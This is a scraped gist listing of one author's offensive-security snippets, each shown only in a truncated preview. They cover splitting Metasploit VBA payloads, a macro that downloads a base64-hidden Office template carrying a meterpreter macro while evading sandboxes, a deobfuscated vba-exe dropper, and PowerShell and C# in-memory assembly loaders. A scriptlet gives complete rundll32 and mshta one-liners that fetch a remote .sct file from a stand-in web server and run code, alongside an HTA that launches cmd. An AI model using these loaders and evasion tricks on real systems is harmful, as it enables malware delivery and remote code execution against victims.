Arno0x
Arno0x
/ mergeVBAPayload.vba
Last active
October 12, 2023 23:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' Sometimes, after generating a metasploit payload with vba output format, you get a payload which is too long | |
| ' for the vba line continuation limit (24 line continuation max) | |
| ' So you have to split the payload in two arrays, then merge them again. | |
| ' | |
| ' This snippet shows the simple trick | |
| Dim PayloadPart1, PayloadPart2, Final As Variant | |
| PayloadPart1 = Array ( whatever metasploit first part payload with line _ | |
| continuation _ |
Arno0x
/ formatConverter.py
Created
February 15, 2017 10:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf8 -*- | |
| # | |
| # Author: Arno0x0x, Twitter: @Arno0x0x | |
| # | |
| import argparse | |
| #====================================================================================================== | |
| # HELPERS FUNCTIONS | |
| #====================================================================================================== |
Arno0x
/ macro_evade_av_01.vba
Last active
October 12, 2023 23:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' Author Arno0x0x - https://twitter.com/Arno0x0x | |
| ' | |
| ' This macro downloads an XML bibliography source file. | |
| ' The <Title> element of this XML file actually contains a base64 encoded MSOffice template | |
| ' which itself contains another malicious macro much more detectable (meterpreter for instance). | |
| ' | |
| ' The base64 encoded file (payload) is extracted from the XML file, decoded and saved on the temporary folder | |
| ' Only then, an new Office Word object is instantiated to load this Office Template and run a specific macro from it. | |
| ' | |
| ' This macro makes use of very basic tricks to evade potential sandbox analysis, such as popup windows, check of local printers |
Arno0x
/ officeEmbeddedFileDecode.vba
Last active
October 12, 2023 23:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' This is a deobfuscated view of the 'vba-exe' output format of metasploit payload | |
| ' | |
| ' This macro searches for a marker paragraph, namely "marker" in the example below | |
| ' and then loads all paragraphs coming next, as a sequence of bytes, then saves it to | |
| ' a local file. | |
| ' | |
| ' Example, in the word document: | |
| ' marker | |
| ' &H4d&H5a&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00 .... |
Arno0x
/ loadAssembly_method1.ps1
Last active
October 12, 2023 23:19
Load a .Net assembly dynamically from PowerShell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Source = @" | |
| using System; | |
| using System.Net; | |
| using System.Reflection; | |
| namespace LoadAssembly { | |
| public static class LoadAssembly { | |
| public static void load() { | |
| WebClient webclient = new WebClient(); | |
| IWebProxy defaultProxy = WebRequest.DefaultWebProxy; | |
| if (defaultProxy != null) { |
Arno0x
/ scriptlet.sct
Created
November 17, 2017 16:49
Scriplet that can be executed by mshta or rundll32 for arbitrary code execution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --> | |
| <!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --> | |
| <scriptlet> | |
| <public> | |
| </public> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <HTA:APPLICATION ID="HelloExample"> | |
| <script language="jscript"> | |
| var c = "cmd.exe /c calc.exe"; | |
| new ActiveXObject('WScript.Shell').Run(c); | |
| </script> | |
| </head> | |
| <body> | |
| <script>self.close();</script> |
Arno0x
/ TestAssembly.cs
Last active
February 21, 2024 20:47
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ================================ Compile as a .Net DLL ============================== | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs | |
| */ | |
| using System.Windows.Forms; | |
| namespace TestNamespace |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf8 -*- | |
| import sys | |
| import random | |
| import time | |
| import re | |
| import argparse | |
| import os | |
| # Import external modules |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf8 -*- | |
| from sys import stdout | |
| import json | |
| import os | |
| # Import external modules | |
| try: | |
| import requests | |
| except ModuleNotFoundError as e: |